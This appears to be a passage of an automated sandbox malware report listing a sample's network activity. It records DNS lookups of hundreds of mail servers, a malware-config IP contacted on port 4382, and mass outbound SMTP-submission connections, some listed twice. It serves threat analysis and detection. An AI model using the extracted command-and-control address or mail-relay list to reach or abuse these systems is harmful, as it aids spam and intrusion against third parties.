                      Source: C:\Windows\System32\svchost.exeDomain query: mx37.mb5p.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.univers-actu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.pacnet.netau
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ziggo.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: blakehurst.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postmaster.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: loens.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.forfas.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.antasinsaat.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.muenzen-becker.de
                      Source: C:\Windows\System32\svchost.exeDomain query: laga.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgilio.it
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.scoilmhuirelongford.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.market-wave.link
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.2cr-h.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.nexgo.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.marin.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: relay.upm.es
                      Source: C:\Windows\System32\svchost.exeDomain query: out.horizon-xl.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.elitter.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx.l.google.com
                      Source: Malware configuration extractorURLs: 212.162.153.199
                      Source: unknownDNS traffic detected: query: out.gammu.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.testroamright.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.muenzen-becker.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.scoilmhuirelongford.ie replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.horizon-xl.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: test789.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.avis.cl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.xtremexcavation.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.therightweigh.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.acetec.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.oita.jtuc-rengo.jp replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.shortlinesales.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.framgangsrikaforetag.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.mandres.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.market-wave.link replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.hexatech.com.my replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: constelacionesmadrid.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.mairie-habsheim.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.rsaweb.co.za replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.cardnet.co.jp replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.thegreataunties.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.lachambre.be replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.rapeli.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ghuitf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.csgs.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: securesmtp.mjbelda.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.hyacinthhouse.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.americanaugers.jp replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.venter.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.irvineproject.cn replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.bindifencing.com.au replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.elhassociates.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: naoansiedade.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.limpec.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.bwana.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.mchscares.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.hightelecom.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.grafikdev.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.theoxfordhotel.com.au replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.wtqudu.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: chrislittell.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.oaktreefinancial.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.clayton.k.ga.us replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.fada.co.jp replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.host-41-196-190-143.static.link.com.eg replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.elitter.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.ding.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.sonar.co.hu replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.jmichaelvinson.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.teccart.online replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.atlanticexpress.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.strath.ac.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.pacnet.netau replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.piramitgroup.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.tmd-tunelmuhendisligi.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.selfcateringinknysna.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.caso.es replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: out.multicopia360.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.mytrixtech.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.irvinhomesfl.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.allianceinsurance.in replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.sps-co.jp replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.robbievox.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.hereiam.plus.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.exois.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: lfsvechta.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.apotecbay.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.uniquedestinationsllc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.southeastrec.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.opsofis.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.mamasimon.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: newday-technology.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.zgm.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.eclplastics.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.clements1975.fslife.co.uk replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: smtp.etica.conc-bmw.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.ddfs.dsf replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.dolores.art.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.acicapital.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.arenaholidays.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.ezz.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.milaus.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.shop-e-nfinite.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: 94c8b50eb70aa4c8.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.desomniac.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: audiomaster.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.web-schaaf.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.hotmy.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.fluid.demon.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.lykiabotanika.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.servicioscorporativos.mx replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.fivefigureweeks.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.vermessungsseiten.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.credibo.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.lcampino.cl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.bleisetzer.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.rockfiend.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.flt.khaitanpublicschool.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.viasu.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.lebcedars.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.capaci.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.cotamicro.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.heroofhealth.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.brpindustries.com.au replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.caledonian.ac.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.lollygaggeru.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.forfas.ie replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.mpost.co.nz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.2cr-h.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.caistergolf.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ivan-elkin.name replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ghuitf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.aumentarpenis.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.clubinternet.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: hmajdal.tzafonet.org.il replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: secure.helanta.sh replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.anystars.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.marginalis.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.sohns-ruit.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.tamkinhochberg.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ms-scorpio.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.emarki.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: eddwebs.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.apollosouth.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.rlmorgan.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.17hotmayil.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: hyacinthhouse.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.integrapost.cl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.tecdev.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.sputtr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.dynamicpayoff.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.sayclub.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.bpmconsultants.in replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.xnodfu.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.gemicomp.com.ar replaycode: Name error (3)
                      Source: unknownNetwork traffic detected: DNS query count 373
                      Source: unknownNetwork traffic detected: IP country count 23
                      Source: global trafficTCP traffic: 192.168.2.5:49712 -> 212.162.153.199:4382
                      Source: global trafficTCP traffic: 192.168.2.5:49716 -> 193.122.179.25:587
                      Source: global trafficTCP traffic: 192.168.2.5:49717 -> 46.255.231.70:587
                      Source: global trafficTCP traffic: 192.168.2.5:49718 -> 3.125.131.179:587
                      Source: global trafficTCP traffic: 192.168.2.5:49721 -> 142.93.237.125:587
                      Source: global trafficTCP traffic: 192.168.2.5:49723 -> 38.111.141.32:587
                      Source: global trafficTCP traffic: 192.168.2.5:49724 -> 209.85.202.27:587
                      Source: global trafficTCP traffic: 192.168.2.5:49725 -> 84.116.6.22:587
                      Source: global trafficTCP traffic: 192.168.2.5:49729 -> 35.188.203.92:587
                      Source: global trafficTCP traffic: 192.168.2.5:49730 -> 194.158.122.55:587
                      Source: global trafficTCP traffic: 192.168.2.5:49732 -> 194.25.134.76:587
                      Source: global trafficTCP traffic: 192.168.2.5:49733 -> 163.178.163.178:587
                      Source: global trafficTCP traffic: 192.168.2.5:49734 -> 74.122.245.43:587
                      Source: global trafficTCP traffic: 192.168.2.5:49735 -> 167.172.23.243:587
                      Source: global trafficTCP traffic: 192.168.2.5:49736 -> 195.130.132.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:49738 -> 52.21.50.234:587
                      Source: global trafficTCP traffic: 192.168.2.5:49739 -> 199.224.64.207:587
                      Source: global trafficTCP traffic: 192.168.2.5:49743 -> 104.131.176.42:587
                      Source: global trafficTCP traffic: 192.168.2.5:49744 -> 76.223.84.192:587
                      Source: global trafficTCP traffic: 192.168.2.5:49747 -> 213.209.1.145:587
                      Source: global trafficTCP traffic: 192.168.2.5:49748 -> 120.50.131.112:587
                      Source: global trafficTCP traffic: 192.168.2.5:49752 -> 80.75.42.226:587
                      Source: global trafficTCP traffic: 192.168.2.5:49755 -> 46.255.231.19:587
                      Source: global trafficTCP traffic: 192.168.2.5:49758 -> 210.151.38.75:587
                      Source: global trafficTCP traffic: 192.168.2.5:49761 -> 79.110.87.192:587
                      Source: global trafficTCP traffic: 192.168.2.5:49762 -> 195.121.65.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:49763 -> 162.159.205.13:587
                      Source: global trafficTCP traffic: 192.168.2.5:49764 -> 104.18.2.81:587
                      Source: global trafficTCP traffic: 192.168.2.5:49767 -> 40.85.218.2:587
                      Source: global trafficTCP traffic: 192.168.2.5:49769 -> 60.43.238.237:587
                      Source: global trafficTCP traffic: 192.168.2.5:49771 -> 198.252.105.116:587
                      Source: global trafficTCP traffic: 192.168.2.5:49772 -> 84.116.6.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:49782 -> 81.7.169.195:587
                      Source: global trafficTCP traffic: 192.168.2.5:49784 -> 72.52.178.23:587
                      Source: global trafficTCP traffic: 192.168.2.5:49785 -> 66.96.131.35:587
                      Source: global trafficTCP traffic: 192.168.2.5:49786 -> 216.40.42.154:587
                      Source: global trafficTCP traffic: 192.168.2.5:49787 -> 84.2.43.67:587
                      Source: global trafficTCP traffic: 192.168.2.5:49789 -> 109.95.154.150:587
                      Source: global trafficTCP traffic: 192.168.2.5:49794 -> 195.238.20.30:587
                      Source: global trafficTCP traffic: 192.168.2.5:49796 -> 65.20.63.172:587
                      Source: global trafficTCP traffic: 192.168.2.5:49797 -> 68.178.252.117:587
                      Source: global trafficTCP traffic: 192.168.2.5:49798 -> 212.10.10.66:587
                      Source: global trafficTCP traffic: 192.168.2.5:49799 -> 84.116.6.3:587
                      Source: global trafficTCP traffic: 192.168.2.5:49801 -> 193.122.131.100:587
                      Source: global trafficTCP traffic: 192.168.2.5:49805 -> 209.67.129.100:587
                      Source: global trafficTCP traffic: 192.168.2.5:49807 -> 216.69.141.113:587
                      Source: global trafficTCP traffic: 192.168.2.5:49808 -> 104.196.163.23:587
                      Source: global trafficTCP traffic: 192.168.2.5:49809 -> 168.0.132.203:587
                      Source: global trafficTCP traffic: 192.168.2.5:49811 -> 213.209.1.147:587
                      Source: global trafficTCP traffic: 192.168.2.5:49817 -> 18.190.56.214:587
                      Source: global trafficTCP traffic: 192.168.2.5:49818 -> 185.159.32.4:587
                      Source: global trafficTCP traffic: 192.168.2.5:49819 -> 52.16.25.241:587
                      Source: global trafficTCP traffic: 192.168.2.5:49820 -> 129.187.254.228:587
                      Source: global trafficTCP traffic: 192.168.2.5:49821 -> 162.0.229.59:587
                      Source: global trafficTCP traffic: 192.168.2.5:49822 -> 34.102.221.37:587
                      Source: global trafficTCP traffic: 192.168.2.5:49823 -> 120.138.68.152:587
                      Source: global trafficTCP traffic: 192.168.2.5:49830 -> 52.147.208.244:587
                      Source: global trafficTCP traffic: 192.168.2.5:49831 -> 81.7.169.194:587
                      Source: global trafficTCP traffic: 192.168.2.5:49832 -> 64.59.136.142:587
                      Source: global trafficTCP traffic: 192.168.2.5:49836 -> 64.136.52.50:587
                      Source: global trafficTCP traffic: 192.168.2.5:49838 -> 138.102.156.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:49840 -> 191.252.112.195:587
                      Source: global trafficTCP traffic: 192.168.2.5:49841 -> 106.153.226.2:587
                      Source: global trafficTCP traffic: 192.168.2.5:49843 -> 217.74.65.52:587
                      Source: global trafficTCP traffic: 192.168.2.5:49844 -> 109.234.162.66:587
                      Source: global trafficTCP traffic: 192.168.2.5:49845 -> 129.213.180.114:587
                      Source: global trafficTCP traffic: 192.168.2.5:49846 -> 130.117.54.106:587
                      Source: global trafficTCP traffic: 192.168.2.5:49847 -> 104.47.71.202:587
                      Source: global trafficTCP traffic: 192.168.2.5:49848 -> 31.193.252.56:587
                      Source: global trafficTCP traffic: 192.168.2.5:49850 -> 175.135.254.129:587
                      Source: global trafficTCP traffic: 192.168.2.5:49853 -> 5.183.8.124:587
                      Source: global trafficTCP traffic: 192.168.2.5:49854 -> 78.100.10.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:49856 -> 182.248.170.226:587
                      Source: global trafficTCP traffic: 192.168.2.5:49858 -> 104.143.9.110:587
                      Source: global trafficTCP traffic: 192.168.2.5:49859 -> 52.101.73.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:49860 -> 64.136.52.44:587
                      Source: global trafficTCP traffic: 192.168.2.5:49862 -> 88.99.236.167:587
                      Source: global trafficTCP traffic: 192.168.2.5:49868 -> 129.159.110.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:49869 -> 51.140.191.223:587
                      Source: global trafficTCP traffic: 192.168.2.5:61673 -> 94.152.219.6:587
                      Source: global trafficTCP traffic: 192.168.2.5:61674 -> 92.43.203.144:587
                      Source: global trafficTCP traffic: 192.168.2.5:61675 -> 193.70.18.144:587
                      Source: global trafficTCP traffic: 192.168.2.5:61677 -> 82.194.66.60:587
                      Source: global trafficTCP traffic: 192.168.2.5:61679 -> 194.181.93.175:587
                      Source: global trafficTCP traffic: 192.168.2.5:61690 -> 179.190.34.5:587
                      Source: global trafficTCP traffic: 192.168.2.5:61691 -> 180.37.199.27:587
                      Source: global trafficTCP traffic: 192.168.2.5:61693 -> 15.197.130.221:587
                      Source: global trafficTCP traffic: 192.168.2.5:61697 -> 72.52.179.174:587
                      Source: global trafficTCP traffic: 192.168.2.5:61699 -> 81.169.145.97:587
                      Source: global trafficTCP traffic: 192.168.2.5:61703 -> 138.100.200.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61704 -> 41.193.157.227:587
                      Source: global trafficTCP traffic: 192.168.2.5:61705 -> 149.106.174.170:587
                      Source: global trafficTCP traffic: 192.168.2.5:61706 -> 52.223.34.187:587
                      Source: global trafficTCP traffic: 192.168.2.5:61709 -> 47.43.18.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:61712 -> 209.71.208.9:587
                      Source: global trafficTCP traffic: 192.168.2.5:61713 -> 169.61.124.242:587
                      Source: global trafficTCP traffic: 192.168.2.5:61721 -> 85.13.146.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61722 -> 13.57.89.168:587
                      Source: global trafficTCP traffic: 192.168.2.5:61728 -> 85.93.219.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61729 -> 52.101.10.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61734 -> 173.203.187.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61735 -> 178.250.10.199:587
                      Source: global trafficTCP traffic: 192.168.2.5:61737 -> 88.86.121.146:587
                      Source: global trafficTCP traffic: 192.168.2.5:61739 -> 93.104.207.155:587
                      Source: global trafficTCP traffic: 192.168.2.5:61743 -> 104.247.81.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61745 -> 64.190.63.222:587
                      Source: global trafficTCP traffic: 192.168.2.5:61747 -> 200.40.31.8:587
                      Source: global trafficTCP traffic: 192.168.2.5:61748 -> 162.215.97.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61750 -> 74.125.26.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61752 -> 13.251.65.157:587
                      Source: global trafficTCP traffic: 192.168.2.5:61755 -> 212.227.15.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61759 -> 191.6.216.99:587
                      Source: global trafficTCP traffic: 192.168.2.5:61762 -> 64.233.186.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61766 -> 2.207.150.234:587
                      Source: global trafficTCP traffic: 192.168.2.5:61768 -> 81.2.195.67:587
                      Source: global trafficTCP traffic: 192.168.2.5:61774 -> 5.175.14.63:587
                      Source: global trafficTCP traffic: 192.168.2.5:61778 -> 24.222.0.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61782 -> 62.169.183.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61783 -> 13.248.169.48:587
                      Source: global trafficTCP traffic: 192.168.2.5:61784 -> 35.201.134.121:587
                      Source: global trafficTCP traffic: 192.168.2.5:61786 -> 15.197.192.55:587
                      Source: global trafficTCP traffic: 192.168.2.5:61788 -> 89.161.204.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61789 -> 131.188.16.206:587
                      Source: global trafficTCP traffic: 192.168.2.5:61791 -> 81.169.145.84:587
                      Source: global trafficTCP traffic: 192.168.2.5:61792 -> 104.21.59.103:587
                      Source: global trafficTCP traffic: 192.168.2.5:61793 -> 45.119.84.172:587
                      Source: global trafficTCP traffic: 192.168.2.5:61797 -> 195.251.255.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61799 -> 154.70.144.136:587
                      Source: global trafficTCP traffic: 192.168.2.5:61802 -> 129.158.253.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61803 -> 216.113.192.36:587
                      Source: global trafficTCP traffic: 192.168.2.5:61805 -> 45.33.20.235:587
                      Source: global trafficTCP traffic: 192.168.2.5:61809 -> 62.121.128.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61812 -> 147.182.160.18:587
                      Source: global trafficTCP traffic: 192.168.2.5:61815 -> 64.59.128.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61816 -> 220.73.163.120:587
                      Source: global trafficTCP traffic: 192.168.2.5:61824 -> 200.42.138.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61828 -> 62.149.188.200:587
                      Source: global trafficTCP traffic: 192.168.2.5:61830 -> 84.116.6.19:587
                      Source: global trafficTCP traffic: 192.168.2.5:61831 -> 13.32.87.77:587
                      Source: global trafficTCP traffic: 192.168.2.5:61833 -> 109.72.89.197:587
                      Source: global trafficTCP traffic: 192.168.2.5:61834 -> 15.197.240.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61842 -> 79.96.164.169:587
                      Source: global trafficTCP traffic: 192.168.2.5:61845 -> 202.124.241.196:587
                      Source: global trafficTCP traffic: 192.168.2.5:61850 -> 77.78.119.119:587
                      Source: global trafficTCP traffic: 192.168.2.5:61851 -> 109.61.0.141:587
                      Source: global trafficTCP traffic: 192.168.2.5:61854 -> 103.224.212.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61855 -> 15.197.142.173:587
                      Source: global trafficTCP traffic: 192.168.2.5:61857 -> 91.121.56.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61858 -> 91.235.53.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61861 -> 178.210.170.80:587
                      Source: global trafficTCP traffic: 192.168.2.5:61862 -> 195.202.128.4:587
                      Source: global trafficTCP traffic: 192.168.2.5:61863 -> 75.2.24.159:587
                      Source: global trafficTCP traffic: 192.168.2.5:61864 -> 212.35.60.35:587
                      Source: global trafficTCP traffic: 192.168.2.5:61868 -> 203.134.71.82:587
                      Source: global trafficDNS traffic detected: number of DNS queries: 373
                      Source: Joe Sandbox ViewIP Address: 209.222.82.255 209.222.82.255
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewASN Name: CASABLANCA-ASInternetCollocationProviderCZ CASABLANCA-ASInternetCollocationProviderCZ
                      Source: Joe Sandbox ViewASN Name: VINAGAME-AS-VNVNGCorporationVN VINAGAME-AS-VNVNGCorporationVN
                      Source: global trafficTCP traffic: 192.168.2.5:49716 -> 193.122.179.25:587
                      Source: global trafficTCP traffic: 192.168.2.5:49717 -> 46.255.231.70:587
                      Source: global trafficTCP traffic: 192.168.2.5:49718 -> 3.125.131.179:587
                      Source: global trafficTCP traffic: 192.168.2.5:49721 -> 142.93.237.125:587
                      Source: global trafficTCP traffic: 192.168.2.5:49723 -> 38.111.141.32:587
                      Source: global trafficTCP traffic: 192.168.2.5:49724 -> 209.85.202.27:587
                      Source: global trafficTCP traffic: 192.168.2.5:49725 -> 84.116.6.22:587
                      Source: global trafficTCP traffic: 192.168.2.5:49729 -> 35.188.203.92:587
                      Source: global trafficTCP traffic: 192.168.2.5:49730 -> 194.158.122.55:587
                      Source: global trafficTCP traffic: 192.168.2.5:49732 -> 194.25.134.76:587
                      Source: global trafficTCP traffic: 192.168.2.5:49733 -> 163.178.163.178:587
                      Source: global trafficTCP traffic: 192.168.2.5:49734 -> 74.122.245.43:587
                      Source: global trafficTCP traffic: 192.168.2.5:49735 -> 167.172.23.243:587
                      Source: global trafficTCP traffic: 192.168.2.5:49736 -> 195.130.132.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:49738 -> 52.21.50.234:587
                      Source: global trafficTCP traffic: 192.168.2.5:49739 -> 199.224.64.207:587
                      Source: global trafficTCP traffic: 192.168.2.5:49743 -> 104.131.176.42:587
                      Source: global trafficTCP traffic: 192.168.2.5:49744 -> 76.223.84.192:587
                      Source: global trafficTCP traffic: 192.168.2.5:49747 -> 213.209.1.145:587
                      Source: global trafficTCP traffic: 192.168.2.5:49748 -> 120.50.131.112:587
                      Source: global trafficTCP traffic: 192.168.2.5:49752 -> 80.75.42.226:587
                      Source: global trafficTCP traffic: 192.168.2.5:49755 -> 46.255.231.19:587
                      Source: global trafficTCP traffic: 192.168.2.5:49758 -> 210.151.38.75:587
                      Source: global trafficTCP traffic: 192.168.2.5:49761 -> 79.110.87.192:587
                      Source: global trafficTCP traffic: 192.168.2.5:49762 -> 195.121.65.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:49763 -> 162.159.205.13:587
                      Source: global trafficTCP traffic: 192.168.2.5:49764 -> 104.18.2.81:587
                      Source: global trafficTCP traffic: 192.168.2.5:49767 -> 40.85.218.2:587
                      Source: global trafficTCP traffic: 192.168.2.5:49769 -> 60.43.238.237:587
                      Source: global trafficTCP traffic: 192.168.2.5:49771 -> 198.252.105.116:587
                      Source: global trafficTCP traffic: 192.168.2.5:49772 -> 84.116.6.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:49782 -> 81.7.169.195:587
                      Source: global trafficTCP traffic: 192.168.2.5:49784 -> 72.52.178.23:587
                      Source: global trafficTCP traffic: 192.168.2.5:49785 -> 66.96.131.35:587
                      Source: global trafficTCP traffic: 192.168.2.5:49786 -> 216.40.42.154:587
                      Source: global trafficTCP traffic: 192.168.2.5:49787 -> 84.2.43.67:587
                      Source: global trafficTCP traffic: 192.168.2.5:49789 -> 109.95.154.150:587
                      Source: global trafficTCP traffic: 192.168.2.5:49794 -> 195.238.20.30:587
                      Source: global trafficTCP traffic: 192.168.2.5:49796 -> 65.20.63.172:587
                      Source: global trafficTCP traffic: 192.168.2.5:49797 -> 68.178.252.117:587
                      Source: global trafficTCP traffic: 192.168.2.5:49798 -> 212.10.10.66:587
                      Source: global trafficTCP traffic: 192.168.2.5:49799 -> 84.116.6.3:587
                      Source: global trafficTCP traffic: 192.168.2.5:49801 -> 193.122.131.100:587
                      Source: global trafficTCP traffic: 192.168.2.5:49805 -> 209.67.129.100:587
